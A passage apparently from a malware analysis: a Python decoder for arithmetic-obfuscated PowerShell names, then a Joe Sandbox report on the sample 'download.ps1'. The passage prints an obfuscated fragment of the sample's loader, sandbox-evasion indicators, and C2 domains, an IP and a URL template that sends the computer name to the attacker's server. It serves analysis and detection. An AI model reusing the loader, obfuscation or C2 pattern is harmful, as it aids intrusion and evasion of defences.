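obfuscator only uses +, -, * and / are the author's.

```python
"""Static decoder for the arithmetic-string obfuscation in the AMSI fragment above.
Names are built at run time as [system.String]::new(@((3501-(4859110/1415)),...)) or
([char[]]@(...) -join ''); this evaluates the arithmetic with a restricted AST walker
and never invokes powershell.exe.  Added example, not report or sample code."""
import ast
import operator
import re
from fractions import Fraction
from typing import Iterator, List, Tuple

# Only the operators the obfuscator uses (assumption); anything else is rejected.
_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub,
           ast.Mult: operator.mul, ast.Div: operator.truediv}
_ARITH_OK = re.compile(r"[\d\s+\-*/(),]+")   # an @( ) body we are willing to decode
_WRAPPERS = (
    # $o.(([system.String]::new('Name')))(args)  ->  $o.Name(args)
    re.compile(r"\.\(\(\[system\.String\]::new\('(\w+)'\)\)\)", re.IGNORECASE),
    # $o.(([char[]]'Name' -join ''))(args)        ->  $o.Name(args)
    re.compile(r"\.\(\(\[char\[\]\]'(\w+)' -join ''\)\)", re.IGNORECASE),
)

def _eval(node: ast.AST) -> Fraction:
    """Exact evaluation of integer arithmetic; Fraction keeps division exact."""
    if isinstance(node, ast.Expression):
        return _eval(node.body)
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return Fraction(node.value)
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
        return -_eval(node.operand)
    if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
        return _BINOPS[type(node.op)](_eval(node.left), _eval(node.right))
    raise ValueError(f"unsupported syntax in obfuscated expression: {ast.dump(node)}")

def eval_char_expr(expr: str) -> str:
    """One PowerShell integer expression -> the character it encodes."""
    value = _eval(ast.parse(expr.strip(), mode="eval"))
    if value.denominator != 1 or not 0 <= value <= 0x10FFFF:
        raise ValueError(f"{expr!r} evaluates to {value}, not a code point")
    return chr(int(value))

def _split_top_level(body: str) -> List[str]:
    """Split an array body on the commas that sit outside parentheses."""
    parts, cur, depth = [], [], 0
    for ch in body:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return [p for p in parts if p.strip()]

def decode_array(body: str) -> str:
    """Decode the body of one @( ... ) array into the string it spells."""
    return "".join(eval_char_expr(p) for p in _split_top_level(body))

def _find_arrays(script: str) -> Iterator[Tuple[int, int, str]]:
    """Yield (start, end, body) for every @( ... ) whose body is pure arithmetic."""
    i = 0
    while (start := script.find("@(", i)) >= 0:
        depth, j = 0, start + 1
        while j < len(script):           # find the parenthesis that closes @(
            if script[j] == "(":
                depth += 1
            elif script[j] == ")":
                depth -= 1
                if depth == 0:
                    break
            j += 1
        else:
            return                       # unbalanced: AMSI buffers are often truncated
        body = script[start + 2:j]
        if _ARITH_OK.fullmatch(body):
            yield start, j + 1, body
        i = start + 2

def recovered_names(script: str) -> List[str]:
    """Every string the arithmetic arrays spell, in order of appearance."""
    return [decode_array(body) for _, _, body in _find_arrays(script)]

def deobfuscate(script: str) -> str:
    """Replace each arithmetic array with a quoted literal, then fold the
    String::new / [char[]] -join wrappers into plain member accesses."""
    out, pos = [], 0
    for start, end, body in _find_arrays(script):
        out.append(script[pos:start])
        out.append("'" + decode_array(body).replace("'", "''") + "'")
        pos = end
    out.append(script[pos:])
    text = "".join(out)
    for pat in _WRAPPERS:
        text = pat.sub(r".\1", text)
    return text

# The report's AMSI entry, Source column removed; the final GetString argument is
# truncated in the report itself.
AMSI_FRAGMENT = r"""[IO.Compression.CompressionMode]::Decompress)) $vws3l6gj5oybp1t.(([system.String]::new(@((3501-(4859110/1415)),(-7147+(6212+1046)),(332864/2972),(352715/(8422-(-1154+6661))),(-3618+(32659044/8822)),(-3992+(-3127+7230))))))( $lmwog3a4byc7z5d ) $vws3l6gj5oybp1t.(([system.String]::new(@((412117/6151),(4341-4233),(149184/1344),(-426+541),(941421/9321)))))()$gjpcd91vshno372.(([char[]]@((654657/9771),(-9956+(99804688/9917)),(305694/(9256-6502)),(705985/(2527+(11991840/3320))),(-8435+(306+8230))) -join ''))()[byte[]] $qk5tjuw9ngo0xf1 = $lmwog3a4byc7z5d.(([system.String]::new(@((838656/9984),(8216-(4887315/(4612950/(105+(11294-(13784-10035)))))),(-239+(324976/1069)),(-6170+6284),(1025544/(9908-(-505+1417))),(800153/(14695-6446)),(582978/(9270-4452))))))() $2kz9pblfo8ruq1d=$qk5tjuw9ngo0xf1 return $2kz9pblfo8ruq1d}[System.Text.Encoding]::ascii.(([system.String]::new(@((8987-8916),(-5126+(5796743/1109)),(-9947+(17989-(23262810/(11120-8185)))),(215800/(10283000/3955)),(7513-(1791+5606)),(-8929+(22191522/2454)),(-3550+3655),(-3921+(5973-1942)),(-7694+(4389711/(-6151+6714)))))))((guzwyhi85ros4cblt9jmdxpq7n2"""
```

Running deobfuscate(AMSI_FRAGMENT) turns the entry into `$vws3l6gj5oybp1t.CopyTo( $lmwog3a4byc7z5d ) $vws3l6gj5oybp1t.Close()$gjpcd91vshno372.Close()[byte[]] $qk5tjuw9ngo0xf1 = $lmwog3a4byc7z5d.ToArray() ... [System.Text.Encoding]::ascii.GetString((guzwyhi85ros4cblt9jmdxpq7n2`. Division is evaluated as an exact Fraction and anything that is not an integer code point is rejected, which is the check PowerShell itself would not make: it would silently coerce a fractional result, so a decoder that rounds can spell the wrong name without noticing.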

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (this entry is repeated 116 times in the report)

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3908
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6005
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3132 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000000.00000002.1719127106.00000287DCD46000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1719127106.00000287DCD46000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1779315827.00000287F4190000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
Source: powershell.exe, 00000000.00000002.1719127106.00000287DC978000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine MSFT_MpComputerStatus MSFT_MpComputerStatusata>
Source: powershell.exe, 00000000.00000002.1719127106.00000287DCD46000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1719127106.00000287DCD46000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1719127106.00000287DC978000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1719127106.00000287DCD46000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 121 Virtualization/Sandbox Evasion | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | 121 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 11 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| download.ps1 | 5% | ReversingLabs | Win32.Trojan.Generic | |

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://kdemjgebjimkanl.top/du64swbeqthtr.php?id=user-PC&key=115667688416&s=527 | 0% | Avira URL Cloud | safe | |
| http://$tjwe1cgqifoz4l3/$6tmq9zsu3l0ofg4.php?id=$env:computername&key=$nwbirdhamkxfje&s=527 | 0% | Avira URL Cloud | safe | |
| http://kdemjgebjimkanl.top | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| kdemjgebjimkanl.top | 45.61.136.138 | true | true | | unknown |
| www.google.com | 142.250.185.132 | true | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://kdemjgebjimkanl.top/du64swbeqthtr.php?id=user-PC&key=115667688416&s=527 | true | Avira URL Cloud: safe | unknown |
| http://www.google.com/ | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://crl.microsoft | powershell.exe, 00000000.00000002.1776222589.00000287F3C10000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://photos.google.com/?tab=wq&pageId=none | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.google.com/preferences?hl=enX | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://csp.withgoogle.com/csp/gws/other-hp | powershell.exe, 00000000.00000002.1719127106.00000287DD43A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/License | powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://news.google.com/?tab=wn | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://docs.google.com/document/?usp=docs_alc | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schema.org/WebPage | powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE344000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE022000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE01E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE34E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE027000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE35D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE33F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE362000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE045000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://0.google.com/ | powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/webhp?tab=ww | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://kdemjgebjimkanl.top | powershell.exe, 00000000.00000002.1719127106.00000287DD122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD433000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://schema.org/WebPageX | powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/ | powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/finance?tab=we | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://maps.google.com/maps?hl=en&tab=wl | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.google.com | powershell.exe, 00000000.00000002.1719127106.00000287DD433000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD43A000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26source | powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://apis.google.com | powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBCCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1719127106.00000287DBAF1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.blogger.com/?tab=wj | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.google.com/mobile/?hl=en&tab=wD | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://play.google.com/?hl=en&tab=w8 | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/imghp?hl=en&tab=wi | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/shopping?hl=en&source=og&tab=wf | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://lh3.googleusercontent.com/ogw/default-user=s96 | powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBCCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://go.micro | powershell.exe, 00000000.00000002.1719127106.00000287DEB06000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://drive.google.com/?tab=wo | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/Icon | powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://0.google | powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://mail.google.com/mail/?tab=wm | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.google.com/preferences?hl=en | powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.youtube.com/?tab=w1 | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://0.google. | powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://lh3.googleusercontent.com/ogw/default-user=s96X | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://$tjwe1cgqifoz4l3/$6tmq9zsu3l0ofg4.php?id=$env:computername&key=$nwbirdhamkxfje&s=527 | powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DF00E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DECEA000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://0.google.com/ | powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://lh3.googleusercontent.com/ogw/default-user=s24 | powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.google.com/history/optout?hl=en | powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://books.google.com/?hl=en&tab=wp | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://translate.google.com/?hl=en&tab=wT | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/intl/en/about/products?tab=whX | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://calendar.google.com/calendar?tab=wc | powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1719127106.00000287DBAF1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://lh3.googleusercontent.com/ogw/default-user=s24X | powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 45.61.136.138 | kdemjgebjimkanl.top | United States | US | 40676 | AS40676 | true |
| 142.250.185.132 | www.google.com | United States | US | 15169 | GOOGLE | false |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582439
Start date and time: 2024-12-30 16:13:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.ps1
Detection: MAL
Classification: mal68.evad.winPS1@2/7@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 10
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 20.12.23.50, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 2008 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: download.ps1
Time      Type             Description
10:13:57  API Interceptor  41x Sleep call for process: powershell.exe modified
Match: 45.61.136.138
Associated Sample Name / URL  Detection  Threat Name  Context
download.ps1                  malicious  Unknown      gajaechkfhfghal.top/he0j3zgk4xhtr.php?id=computer&key=74358253620&s=527
download.ps1                  malicious  Unknown      gajaechkfhfghal.top/u642xz31jvhtr.php?id=user-PC&key=84925345116&s=527
download.ps1                  malicious  Unknown      gajaechkfhfghal.top/fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527
download.ps1                  malicious  Unknown      gajaechkfhfghal.top/yfshl0dga3htr.php?id=user-PC&key=122775442322&s=527
download.ps1                  malicious  Unknown      gajaechkfhfghal.top/6v28jh9yqnhtr.php?id=computer&key=74624839462&s=527
